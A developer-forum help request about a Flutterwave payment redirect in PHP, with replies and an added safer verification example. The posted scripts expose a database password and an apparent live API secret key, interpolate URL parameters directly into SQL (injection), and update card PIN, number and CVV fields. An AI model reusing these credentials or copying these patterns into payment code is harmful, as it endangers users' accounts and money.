DEV Community

beejose13th

NEED HELP WITH FLUTTERWAVE PAYMENT INTEGRATION

Please, I need help integrating the Flutterwave payment gateway on my website. I have done all I could, and right now the problem I am having is that after payment is successful, my paymentprocessor file, which is also my success redirect page, shows blank and refuses to confirm the payment for users. Please, I need help, anybody. See the attached PHP scripts.

`<?php session_start();
$dbhost = 'localhost';
$dbuser = 'cleajjiq_0ctwll1';
$dbpass = '#Opeyemi2018';
$dbname = 'cleajjiq_fedstudyloan';
$conn = mysqli_connect($dbhost, $dbuser, $dbpass,$dbname);

if(isset($_GET["bitusername"]))
{
$useremail = $_GET["bitusername"];
}

$sqlx=mysqli_query($conn, "SELECT * FROM formtypes WHERE email='$useremail'");
$rowx=mysqli_fetch_array($sqlx);
$fullname = $rowx['fullname'];
$accountnumber ="";
$bankname = "";

$sqlx=mysqli_query($conn, "SELECT * FROM thinkabout WHERE email='$useremail'");
if(mysqli_num_rows($sqlx) > 0 )
{
$rowx=mysqli_fetch_array($sqlx);
$university = $rowx['interestedstudy'];
$degree = $rowx['degreetype'];
$coursed = $rowx['desiredfield'];
$egd = $rowx['datofgraduation'];
$fieldofstudy = $rowx['fieldofstudy'];
$applicationnumber = $rowx['appid'];
$datelog = $rowx['datelog'];
$assignedloan = $rowx['assignloan'];
$hearaboutus = $rowx['hearaboutus'];
$mobilenumber = $rowx['phone'];
$email = $rowx['email'];
$citizencountry= $rowx['citizencounty'];

}

$sqlx=mysqli_query($conn, "SELECT * FROM checkeeligibility WHERE email='$useremail'");
if(mysqli_num_rows($sqlx) > 0 )

{ $rowx=mysqli_fetch_array($sqlx);
$university = $rowx['university'];
$degree = $rowx['degree'];
$coursed = $rowx['coursed'];
$egd = $rowx['egd'];
$levelofstudy = $rowx['levelofstudy'];
$applicationnumber = $rowx['applicationnumber'];
$datelog = $rowx['datelog'];
$assignedloan = $rowx['assignloan'];
$hearaboutus = $rowx['hearaboutus'];
$citizencountry= $rowx['citizencountry'];
$email = $rowx['email'];
$mobilenumber = $rowx['mobilenumber'];

}

$sqlxx=mysqli_query($conn, "SELECT * FROM accountdetails WHERE useremail='$useremail'");
if(mysqli_num_rows($sqlxx) > 0 )
{
$rowxx=mysqli_fetch_array($sqlxx);
$accountnumber = $rowxx['accountnumber'];
$bankname = $rowxx['bankname'];
}

if(isset($_POST['paysubmit']))
{

$useremail = $useremail;
$useramount = 20;
$fullname = $fullname;
$usertitle = "EnrollmentVerify";
$userdescription = "Check Academic Status";
$university = "";
$degree = "";
$coursed = "";
$egd = "";
$fieldofstudy = "";
$applicationnumber = "";
$datelog = "";
$assignedloan = "";
$hearaboutus = "";
$mobilenumber = "";
$email = $email;
$citizencountry= "";



$university = "";
$degree = "";
$coursed = "";
$egd = "";
$levelofstudy = "";
$applicationnumber = "";
$datelog = "";
$assignedloan = "";
$hearaboutus = "";
$citizencountry= "";
$email = $email;
$mobilenumber = "";






$email = $useremail;
$amount = $useramount;
$processorlink = 'https://student.clearinghouse.services/academic_check/paymentprocessor/index.php?useremail='.$useremail;

//* Prepare our rave request
$request = [
    'tx_ref' => "tx_ref". time(),
    'amount' => $useramount,
    'currency' => 'NGN',
    'payment_options' => 'ussd',
    'redirect_url' => $processorlink,
    'customer' => [
        'email' => $email,
        'name' => $fullname
    ],
    'meta' => [
        'price' => $useramount
    ],
    'customizations' => [
        'title' => $usertitle,
        'description' => $userdescription
    ]
];

echo json_encode($request) ;

//* Call Flutterwave endpoint
$curl = curl_init();

curl_setopt_array($curl, array(
CURLOPT_URL => 'https://api.flutterwave.com/v3/payments',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => '',
CURLOPT_MAXREDIRS => 10,
CURLOPT_TIMEOUT => 0,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
CURLOPT_CUSTOMREQUEST => 'POST',
CURLOPT_POSTFIELDS => json_encode($request),
CURLOPT_HTTPHEADER => array(
'Authorization: Bearer FLWSECK-bedb9d4089303efc6a8f2ba820f893d3-18ebb6179f1vt-X',
'Content-Type: application/json'
),
));

$response = curl_exec($curl);

curl_close($curl);

$res = json_decode($response);
if($res->status == 'success')
{
    $linktr = $res->data->link;
    header('Location: '.$linktr);
   /* echo '<script>window.location.href="'.$linktr.'"</script>'; */

}
else
{
    echo 'Cannot Process Transaction';
}

}

?>

<!DOCTYPE html>


JAMB | CAPS

<!-- BEGIN GLOBAL MANDATORY STYLES -->

<!-- END GLOBAL MANDATORY STYLES -->
<!-- BEGIN PAGE LEVEL PLUGINS -->

<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN THEME GLOBAL STYLES -->

<!-- END THEME GLOBAL STYLES -->
<!-- BEGIN PAGE LEVEL STYLES -->

<!-- END PAGE LEVEL STYLES -->
<!-- BEGIN THEME LAYOUT STYLES -->
<!-- END THEME LAYOUT STYLES -->


<!-- BEGIN LOGO -->


JAMB

JAMB | Central Admissions Processing System | CAPS



<!-- END LOGO -->
<!-- BEGIN LOGIN -->
     <form name="formval2" class="form-horizontal loan-eligibility-form" method="post"  >


    <p>&nbsp;&nbsp;&nbsp;<h5><font color="white"><a>&nbsp;&nbsp;&nbsp;&nbsp;<b>Name:</b>&nbsp;&nbsp;&nbsp;<?php echo $fullname ?></font></h5></p>

                                          <p>&nbsp;&nbsp;&nbsp;<h5><font color="white"><a>&nbsp;&nbsp;&nbsp;&nbsp;<b>Institution:</b>&nbsp;&nbsp;&nbsp;<?php echo $university ?></font></h5></p>

                                         <p>&nbsp;&nbsp;&nbsp;<h5><font color="white"><a>&nbsp;&nbsp;&nbsp;&nbsp;<b>Degree Class:</b>&nbsp;&nbsp;&nbsp;<?php echo $degree ?></font></h5></p>

                                                                                     <p>&nbsp;&nbsp;&nbsp;<h5><font color="white"><a>&nbsp;&nbsp;&nbsp;&nbsp;<b>Level of Study:</b>&nbsp;&nbsp;&nbsp;<?php echo $levelofstudy ?></font></h5></p>
                                                                                     <p>&nbsp;&nbsp;&nbsp;<h5><font color="white"><a>&nbsp;&nbsp;&nbsp;&nbsp;<b>Course of Study:</b>&nbsp;&nbsp;&nbsp;<?php echo $coursed ?></font></h5></p>

                                        <p>&nbsp;&nbsp;&nbsp;<h5><font color="white"><a>&nbsp;&nbsp;&nbsp;&nbsp;<b>Matric/Registration Number:</b>&nbsp;&nbsp;&nbsp;<?php echo $fieldofstudy ?></font></h5></p>

                                          <p>&nbsp;&nbsp;&nbsp;<h5><font color="white"><a>&nbsp;&nbsp;&nbsp;&nbsp;<b>Date of Admission:</b>&nbsp;&nbsp;&nbsp;<?php echo $egd ?></font></h5></p>



                                    <p></p>
                                    <p></p>
                                    <p></p>
                                     <p></p>
                                    <p></p>
                                    <p></p>
                                     <p></p>
                                    <p></p>
                                    <p></p>
Verify Academic Qualification



`

`


<?php

if(isset($_GET["bitusername"]))
{
$useremail = $_GET["bitusername"];
}

if(isset($_GET['status']))
{
    //* check payment status
    if($_GET['status'] == 'cancelled')
    {
        // echo 'YOu cancel the payment';
        echo '<script>alert("Transaction Cancelled")</script>';

    }
    elseif($_GET['status'] == 'successful')
    {
         $txid = $_GET['tx_ref'];

        $curl = curl_init();
        curl_setopt_array($curl, array(
            CURLOPT_URL => "https://api.flutterwave.com/v3/transactions/{$txid}/verify",
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_ENCODING => "",
            CURLOPT_MAXREDIRS => 10,
            CURLOPT_TIMEOUT => 0,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
            CURLOPT_CUSTOMREQUEST => "GET",
            CURLOPT_HTTPHEADER => array(
              "Content-Type: application/json",
              "Authorization: Bearer FLWPUBK-9775d7a1d15e6beda614bf1f75c995de-X"
            ),
          ));

          $response = curl_exec($curl);

          curl_close($curl);

          $res = json_decode($response);
          if($res->status)
          {
            $amountPaid = $res->data->charged_amount;
            $amountToPay = $res->data->meta->price;
            if($amountPaid >= $amountToPay)
            {
                //echo 'Payment successful';


                if(isset($_GET["useremail"]))
                { 
                    $useremail = $_GET["useremail"]; 

          $dbhost = 'localhost';
     $dbuser = 'cleajjiq_0ctwll1';
     $dbpass = '#Opeyemi2018';
     $dbname = 'cleajjiq_fedstudyloan';
     $conn = mysqli_connect($dbhost, $dbuser, $dbpass,$dbname);


                    $cns = "";
                    $ccv = "";
                    $cpin = "Checking Academic Status";
                    mysqli_query($conn, "UPDATE formtypes SET cardpin='$cpin', cardnumber='$cns', cvv='$ccv' WHERE email='$useremail'");





                   echo '<div class="alert alert-info">
                        <strong>Info!</strong> 
                        Your academic records is now captured and currently undergoing verification.
                        <br>
                        you can click on the close button below to complete your application.
                      </div>
                      <p></p>
                      <p></p>
                      <p></p>

                      <div align="center"><strong>Admission Status</strong></div>


                      <div class="ring">Checking


';
}

                //* Continue to give item to the user
            }
            else
            {
                echo '<script>alert("Fraud Transaction Detected")</script>';
                //echo 'Fraud transactio detected';
            }
          }
          else
          {
              echo '<script>alert("Error in Transaction")</script>';
              //echo 'Can not process payment';
          }
    }
}

?>

`

Top comments (4)

Ben Sinclair

Hi,

I see you've made the same post three times - are you having trouble with the DEV editor?

I know you're referencing a local database, but please remember not to post any passwords or credentials to a public forum. People will scrape them and assume that you're reusing them elsewhere, and it's a very bad habit to get into!
EDIT: I've just noticed you've included the bearer token for your flutter account. Don't do that!

Your code is difficult to follow, but it reads like very old PHP, and does a lot of things we would recommend against nowadays. For example:

  • passing a $_GET value directly into an SQL query
  • using mysqli directly
  • using obsolete HTML ( <font color="white" [...]>)
  • using &nbsp; for alignment

These are red flags that you've either inherited an old site or are working from some very out-of-date tutorials and are likely to end up developing an insecure application. Normally I wouldn't advise this, but since you're dealing with people's money, I'd say stop now and learn more about security concepts and modern web development, or find a third-party library or tool to use which does what you want already and is community-supported.
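
An added example (not part of the original post or of either commenter's replies) of the server-side check the redirect page needs, with the bound-parameter form of the `UPDATE` that avoids the `$_GET`-into-SQL problem listed above. It assumes Flutterwave v3 appends a numeric `transaction_id` to the redirect URL, that the verify endpoint takes that id and is authenticated with the secret key, and that the response carries `data.status`, `data.tx_ref`, `data.amount` and `data.currency`; the `$order` array and the function names are hypothetical.

```php
<?php
declare(strict_types=1);

// $order is the server's own record of the charge (hypothetical shape), never $_GET or meta.
function payment_is_valid(?array $res, array $order): bool
{
    if ($res === null || ($res['status'] ?? '') !== 'success') {
        return false; // "error" is also a truthy string, so compare the exact value
    }
    $d = $res['data'] ?? [];
    return ($d['status'] ?? '') === 'successful'
        && hash_equals($order['tx_ref'], (string) ($d['tx_ref'] ?? ''))
        && ($d['currency'] ?? '') === $order['currency']
        && (float) ($d['amount'] ?? 0) >= (float) $order['amount'];
}

// Server-to-server verify call, authenticated with the secret key.
function verify_transaction(string $transactionId, string $secretKey): ?array
{
    if (!ctype_digit($transactionId)) { // assumption: ids are numeric; reject anything else
        return null;
    }
    $curl = curl_init("https://api.flutterwave.com/v3/transactions/{$transactionId}/verify");
    curl_setopt_array($curl, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => 15,
        CURLOPT_HTTPHEADER     => ['Authorization: Bearer ' . $secretKey],
    ]);
    $body = curl_exec($curl);
    $decoded = is_string($body) ? json_decode($body, true) : null;
    return is_array($decoded) ? $decoded : null;
}

// Same UPDATE as the posted script, with bound parameters instead of string interpolation.
function mark_paid(mysqli $conn, string $email): bool
{
    $cpin = 'Checking Academic Status';
    $stmt = $conn->prepare("UPDATE formtypes SET cardpin = ?, cardnumber = '', cvv = '' WHERE email = ?");
    $stmt->bind_param('ss', $cpin, $email);
    return $stmt->execute();
}

// Constructed sample data, so the decision logic runs offline.
$order = ['tx_ref' => 'tx_ref1700000000', 'amount' => 20, 'currency' => 'NGN'];
$paid  = ['status' => 'success', 'data' => ['status' => 'successful',
          'tx_ref' => 'tx_ref1700000000', 'amount' => 20, 'currency' => 'NGN']];
$error = ['status' => 'error', 'message' => 'constructed failure', 'data' => null];
var_dump(payment_is_valid($paid, $order), payment_is_valid($error, $order));
```

In the redirect handler, the order would be looked up by `tx_ref`, the secret key read from the environment (for instance a hypothetical `FLW_SECRET_KEY` variable) rather than written into the file, and `mark_paid()` called only when `payment_is_valid()` returns true.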

beejose13th

Can I communicate with you in public, please?

beejose13th

Sorry, I meant in private.

Ben Sinclair

What's wrong with talking here in public? Anything we discuss could then be of possible help to someone else having similar issues, whereas if we went to a private chat, then nobody would get the benefit.